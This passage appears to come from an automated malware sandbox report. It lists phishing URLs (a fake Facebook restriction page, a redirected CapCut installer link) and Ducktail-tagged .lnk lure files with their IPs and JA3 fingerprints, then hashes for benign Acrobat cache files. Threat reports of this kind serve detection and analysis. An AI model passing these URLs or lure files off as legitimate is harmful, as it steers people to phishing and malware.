                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.123.96
                                                                                    aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://yo2f2eetmf62.freewebhostmost.com#faren.esau@media24.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.18.11.207
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    CLOUDFLARENETUSO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://nvcourts.gov/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3
                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.123.96
                                                                                    aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://yo2f2eetmf62.freewebhostmost.com#faren.esau@media24.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.18.11.207
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0emonthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 172.67.137.62
                                                                                    O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 172.67.137.62
                                                                                    https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.67.137.62
                                                                                    aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Windows\Temp\myRdpService.exeO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                      SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                        aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                          gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                            U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                              ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                    Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                      6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):209
                                                                                                        Entropy (8bit):5.285885839342554
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVGH5kt1llhPz/iTFJrqzOJkvP5mmCx:men9YOFLvEWdM9QNH6tfi7Z+P4
                                                                                                        MD5:A4CE1CAC26BA6C5ECF688F5B8B415893
                                                                                                        SHA1:15EEEFFF473C40B1A43E98E92B452D86EF1C19B3
                                                                                                        SHA-256:56727F1AF13ABA428E36DD6AB6FBA28DC05A7AEF1F8AA81725FEF22E06DD0A9E
                                                                                                        SHA-512:100FF9029E78FA91691E267C4D75BFC0281E3D5D31F6B20B36A3D9006A09FC80DD9C2C506B02ED4806C0B69997A72DCDB2F7D408DDF3119008A8A4733F2DA2BF
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..A..Eo...................................*"J...........d.{v.^.G...d.W.:...P..k%..A..Eo.........}........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\076dd576a8178299_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):220
                                                                                                        Entropy (8bit):5.325519985885119
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mzYO6LvEwQlRmV4RQEbH6tQApZeByMA/:gOQKoayAI
                                                                                                        MD5:36CEDBE5DD9BC20FD7CB67DB6CC0386D
                                                                                                        SHA1:A6609CDD84BE51B65783DAFA3E2FA7BE51423862
                                                                                                        SHA-256:33CB0103B1C1FE5C282344F84F20B7E39858C1E4621581EA115EA749F520078E
                                                                                                        SHA-512:0864E6667AF1195C0352290EBDDCACDA2410E860416C908E74F842887B4976A93CF71240EE3512CB4EFFB4E0B7DDFE46C5C3EA47BAA80FA8CCCA9617DBBD8F22
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......X....,......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/bootstrap.js ..A..Eo...................................*"J............v5.G..sk.`.....q....O...M9...A..Eo.........(........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):178
                                                                                                        Entropy (8bit):5.129533853800094
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWV9kH5kt1llhdl+D98fZe/O+/rkwGhkg4ma+hX:mi9NqEYOFLvEkXkH6tCZ8Be7Ywcr1
                                                                                                        MD5:870F562CD8CDE56B6599CF7F23FCE7E9
                                                                                                        SHA1:85A007D691214E679C049CC6291B5839A9921C1B
                                                                                                        SHA-256:3FDB44A115EF5D9773FC48C974B44C2BC0E0F2B97C67FB978750D2123EBDACB5
                                                                                                        SHA-512:FEB21006176D7FBC11E4D94D89998A74D84BE8C15B3C9D2A21A4D20CD738F5304003A835F1EEF81B869DD1635F681DE6ED4219242FD8B08BDE8A9FEF6328AFA1
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ..A..Eo...................................*"J.........1.x.'.vI..*|Z..o...+.4....0..A..Eo.........B........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):250
                                                                                                        Entropy (8bit):5.27036359279744
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhu0H6tqt/RlUoSjGY:DyeRVFAFjVFAFQaEtZlUo6
                                                                                                        MD5:9069AD9464D251A6A32A22D171F8FC68
                                                                                                        SHA1:62B04AB052EFC2CB251F26DE04ACF2485B0E8D2C
                                                                                                        SHA-256:AFF8157FDC726CDE89AD5762201B28E4F00BE1363DF6BBBCFB953CC904E6A418
                                                                                                        SHA-512:5595C97958BAAA219EA000DF48E2A0172865D8DCB9EBD14A0198F19CA88F80CB04457FC23464EB1FE3BCEBF0F9B882976C04F38C3481D146ED1B1EECE080B944
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ..A..Eo...................................*"J.........hvDO.N.t@.....n.*...... ....A..Eo.......N.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0a71ed411241f66a_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):198
                                                                                                        Entropy (8bit):5.320719184960297
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lyI5a8RzYOjGLvHkRzNrgG9gWBH5kt1llhtll/qeW1pkgmj/X:mG5YO6LvEV5goTBH6tQeuK
                                                                                                        MD5:960F1E8F162813368EDEE9E30333B945
                                                                                                        SHA1:01D718C843D457F990B6FE303524145BB44AB688
                                                                                                        SHA-256:5D3899058FDDAC19CFBF04E669D212E1AD4C9BE1ED2294364ADDD3CA8A73845C
                                                                                                        SHA-512:3BBBD5B4F56135A193F09D9624494D455FA5C93A9ED0C6A29DF17F5997F798136DFF76B3FBB120A8ED7ABDFCCA8657D30F561F9E4B07A6ACB3BEC368145DD616
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......B...-..T...._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-extras.js ..A..Eo...................................*"J........Z....m.r*.........h..3K..[..@D.A..Eo.......G.)........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0b05805acd0d1882_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):196
                                                                                                        Entropy (8bit):5.256787141316319
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lWCVv8RzYOjGLvHkRzNrgG7KAH5kt1llh1O/dsVgBYmbzUmXi5v:mEVEYO6LvEV5gu3H6t0/KKum/Xi5
                                                                                                        MD5:4D5D108585C714082E73F8F535C53F76
                                                                                                        SHA1:EFA06AF162C0DE89FC443A7CC98E4CBF8BF529A1
                                                                                                        SHA-256:EB0E32032CB35878C0419F66BB4345ECE6B74A216440912742CA7D4D08CFBC87
                                                                                                        SHA-512:7C625DC78BB3D5547A558C6EA33081F0E75B241F38733CF9C98040AE3C3F8F58B234ABC52A571D12EA389426D46F588BE00B225D5289AED4271718315505477A
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......@.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-core.js ..A..Eo...................................*"JH......."....E\..8..$}..<D bg...\.%+..*..A..Eo......c"M.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0c8edd501377e254_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.370953353086988
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mavHYO6LvEwQlRmVH0tu0H6tyZiU/Nvon:pOQKIu0aKiU/N
                                                                                                        MD5:5CDFBF538D486D568EAF8C6ABA429F9D
                                                                                                        SHA1:C6DA6F203E48C596EDBCD40C56281BA6519A4803
                                                                                                        SHA-256:AB37B2E7C047A506594A3D9656FF24A1ACAF0799C07D8360478356F39FE6B501
                                                                                                        SHA-512:72D04283BB54DA8AC7312550C0C9811B665C07891A47115D7CE709E5E72E705CA9F940E0C6B0A884666D97AFDD42AB1865E352FD345D3ABF80BE4D9AD97FCC2B
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y...#......._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/5450-chunk.js ..A..Eo...................................*"Jt.......r........$.r.....U...+cC...4?.A..Eo......kQ..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):214
                                                                                                        Entropy (8bit):5.176781749927772
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:m+yiXYOFLvEWd7VIGXVu0H6tYHzeVVyh9PT4j:pyixRuyaQeVV41T
                                                                                                        MD5:76F5255A6461CFBB8AF22136C9FA6CC1
                                                                                                        SHA1:E234E03B45FD9E53098A674BD9DCC5349483BE3F
                                                                                                        SHA-256:D934E440335300B34C968E2A1363C310EC48AE7D4DF75611762B7A58231F34EC
                                                                                                        SHA-512:572BC776C98B385D92BAC16D6CE65B15B96418F19664E3D4C785D348FFFEC44BB17241C89E9193C0C01BE9BB6515A7B6830B52742888B9CC6C071F58DE150948
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..A..Eo...................................*"J.......k.Q.....-_..y.....O...>..1....A..Eo.......v..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\13121e710409f773_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.364121791981438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mast6EYO6LvEwQlRmVU5ku0H6t8kl2W8ozr/:I9OQKS5ku0abv8C
                                                                                                        MD5:4FDE4500D1881F518B8EDB2EFD75589D
                                                                                                        SHA1:67CF66B7D825D02C9C1119EA1E809AAD4689DF9E
                                                                                                        SHA-256:7FAB980C68F0706BABB5AED8E2E56FA21B276C52EB5CF63692F2132EC4D81B8C
                                                                                                        SHA-512:09625ABB0B6E4DD4659DF5E616205C2B159CFAEC8767A0DF6F3D8B43718F74964DB2F0308EBFCAC4A1746BF4B42B2DD7508BD5649A5711AE53C5038A2694F2DB
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y...K..$...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2241-chunk.js ..A..Eo...................................*"J}........q@...`k...5(......Y}.c<....W...A..Eo......@J..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\1bc86f24c60da374_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.420186767210229
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lze//lA8RzYOjGLvHkwIBIXeRmBVtu0H5kt1llh0llNgdN7YL0p4mn:maOPYO6LvEwQlRmVtu0H6tg+b
                                                                                                        MD5:28ECF38C5B2A6777EE28E1FD8B8BBA2C
                                                                                                        SHA1:C0C878E5C79CF262616E34BB6494DBA17500058F
                                                                                                        SHA-256:69DFBB5222E319A71F673DF4033E2F34986FF050202BBF7E1CB414B42A8704CE
                                                                                                        SHA-512:DAB35FF09AA258681489E8467E74DE1007FC89067256E23E791AA5984FFF4CE2AB17E23DB38304BD103B66D5F7A3559C7CF82F9CF56A31F0AC60ED7E08B5300E
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y...1..C...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/4782-chunk.js ..A..Eo...................................*"J........(+.......(...q..2.W.;......B..A..Eo.......W.\........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):220
                                                                                                        Entropy (8bit):5.29255058178718
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVGH5kt1llhtR/nlYo2sZI8xeGvPP:mvYOFLvEWdhwjQNH6tt3ZIl6P4I/
                                                                                                        MD5:20051E8BCB7C7458ADAAA433D943A268
                                                                                                        SHA1:DD849AFF982B851695B242D367CC313664D5BA36
                                                                                                        SHA-256:FD855408A445DDC3277029D4274D3F4B5F12758B98C61A96F41B1F7662FDDF32
                                                                                                        SHA-512:4E94DB0F9A820FA4BBFE68228FAEEAFDF39822FE5A462B8AD9FAA3DF8FC41EEEF57915114CB6A7C7214CF0C5D2CE5A415843C95C91AA0E81347DB176312A1377
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ..A..Eo...................................*"JP........].>....uUf..N...k......c..l.A..Eo......|..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\25227e55d9136cbc_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.320933063890188
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maiXYO6LvEwQlRmVLeku0H6t8klP9Vr1xnK4/:cOQKru0abLN
                                                                                                        MD5:BE9441027C6B0376AA252F503F7B9859
                                                                                                        SHA1:71F89C318873B5CCF80983AC9FE7131D4CF9AC9E
                                                                                                        SHA-256:41E6B2DACEC9249479619DDD460D1985713356024DC7551FD876561765DA57D4
                                                                                                        SHA-512:7C94F4D4B2372ED54200AE1446FF54057817D1E8B289DE7F0339B39E019F8C97E20B73B8134A5CA63D8331EDC6E6E474438F2BCF7398FB2807E6EC6CB905B0CB
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....qI...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7347-chunk.js ..A..Eo...................................*"J}........P.>..X.t\n....&k..)n....ry..P..A..Eo......@J..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):213
                                                                                                        Entropy (8bit):5.175444452986558
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVGH5kt1llhmHhXDPcyxMtv9Eu:mJYOFLvEWdGQRQOdQNH6taHhD6gw/
                                                                                                        MD5:B9B8F1C325E8520FE8DCAAB90B59193C
                                                                                                        SHA1:14389B3205D0B58F464F2E34ECF0C060A2626079
                                                                                                        SHA-256:75C0895446DFFE309D2FFCB846EB644654F06783274F00BCBD311B1CA34147BF
                                                                                                        SHA-512:D89CABAED72B359822F6C844B3D5566557A35772F69F8AC2E08E7FF1C11F673B216F74C40FF1D20735007B0C386775C8876E90AADBC758055A4AA96E87FBE9EE
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ..A..Eo...................................*"J.........c..y/L....|y.n..C/I.....X7-ne.A..Eo.......q..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):183
                                                                                                        Entropy (8bit):5.126447569376732
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVGH5kt1llh4lecQMWqg4nRb7om5mYUlltl:mOYOFLvECMLGH6tc8NuR/4
                                                                                                        MD5:BF73D23F38652C3151975C5FF8D75476
                                                                                                        SHA1:6F4A7C0B8C32C4492DEDE89990C7B1A3C1EA320D
                                                                                                        SHA-256:1820CA0D5D69472AAFBDCB281D39BA1DFDC06E266F9310150E955BC7587E27D5
                                                                                                        SHA-512:C3E54B3480A7E109874A5D324ABAF9C8C71F2F6661AAE63C7825FB1D3360DF943CA09C476B5F9C3A642112A982CB09AD44CDA92AF4E0B0E48BA11AE070C7AA15
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..A..Eo...................................*"J.........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo......&;@.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\357f987da675909e_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.347905462001916
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maZmEYO6LvEwQlRmVlXu0H6toCRgD9kP4GS:seOQKzXu0aOSgOA
                                                                                                        MD5:942C2ABB977BAB1BFD760A780F7BEAB1
                                                                                                        SHA1:CEB067F2E83B0E8383F60EB995F6ECD699F41C1E
                                                                                                        SHA-256:B15295340DBC011787A056544DEF8BD529F4D4D9C469C25A3A9F683C1411D8EC
                                                                                                        SHA-512:6F8B39E977E3CEA4C07DB3CEC940FAABAAA26A1A2B522E3BB3487333F6E641C89839FD7FDE2EDDE745C568C64FCFD284DB017337C2C41585CD37014E82F232CD
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y...e..6...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9217-chunk.js ..A..Eo...................................*"J.........t......?.>7...w..Qh.X... ;.4...A..Eo.......L..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\42e11ea2ffad8e49_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):220
                                                                                                        Entropy (8bit):5.336636517944429
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lUxpllA8RzYOjGLvHkRzNrgGrVTI6kJGMQH5kt1llhM/lBxlY82QyCIxy9kH5v:mhYO6LvEV5g+VTI613H6tWYMIxy+4C
                                                                                                        MD5:339D68D583999CA011E4C6CB0B51AFA5
                                                                                                        SHA1:16AE3C83E6412BB6BE4DEC2AE4919A5A5398915D
                                                                                                        SHA-256:8A54E065E59B23D39C4D9EE533A687F67403D4748F55F83359E2EC1CA5F06984
                                                                                                        SHA-512:A96BC4A729D1B14AA9944815C5DCB615D2719588D0C031EB549018E31CB51787A2D3B64EFED385C2067C056DF80DE527AE85156E0A7C179752A6E9FB20EA3D11
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......X.....*....._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-web-components-core.js ..A..Eo...................................*"J........d..y+M.. ....LO.....g.!0+.ttCY..A..Eo........."........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4710e2044cd68481_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.374369133639765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:ma3/XYO6LvEwQlRmVHGnu0H6t8klOo4h8AB/:L9OQK1Gnu0ab2f
                                                                                                        MD5:91D30C5D82D8A274ACE9F9EDE438522D
                                                                                                        SHA1:2C33054CA463FB413787C0E600453489F4EFE483
                                                                                                        SHA-256:FD017069560989E84145B61044266169461DF8388A87E93CB65ABF10370C05BB
                                                                                                        SHA-512:3224FF7142D9D74F6670A5D53C636611CAA522EE2951B7E48DDD9CF789102CE85F6E82F38C2F0C8AFE570DF47F67B972AC8203BEB09ECE0D3A4130211054D7F5
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y.....j...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9988-chunk.js ..A..Eo...................................*"J}........RknD..c...'......3.62+.!&R..;..A..Eo......@J..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):181
                                                                                                        Entropy (8bit):5.114678102004504
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvGH5kt1llh4lb6d1dn76KohyP5mYUlltl:md4HXXYOFLvEjMSWFvGH6tckjUdyP4
                                                                                                        MD5:7223384C9D5E339A6AB041D6F10CE44D
                                                                                                        SHA1:A53F75713733F30A26BCF9A1216F0EFFCBCF1E55
                                                                                                        SHA-256:4A506F5460F04B6E10F764944343BC2109D0141B325AD244A1C3D4165AF020E6
                                                                                                        SHA-512:C25A25C28845027B04B6110BCBCBD0C759EB44878D7250DE07F71EED839524500FC1764B3E1D686BE8A3FDEB075605A6825DC77192BBDD67EB837DFF3B351945
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..A..Eo...................................*"J.........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo......&;@.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215
                                                                                                        Entropy (8bit):5.2316965577840495
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:msNXYOFLvEWdpJWNKjQNH6tqHK8E+IUGkAH:BjRpJWNKjeaYHK8NID5
                                                                                                        MD5:3B7D6BA246C831D1FF038BE53E999F9E
                                                                                                        SHA1:A5911345F189E1C512964A687FEC1E6B3707C170
                                                                                                        SHA-256:3D607362619E266D51881C1FFE5733441B7A4945AD48D23DA44542AB41140E57
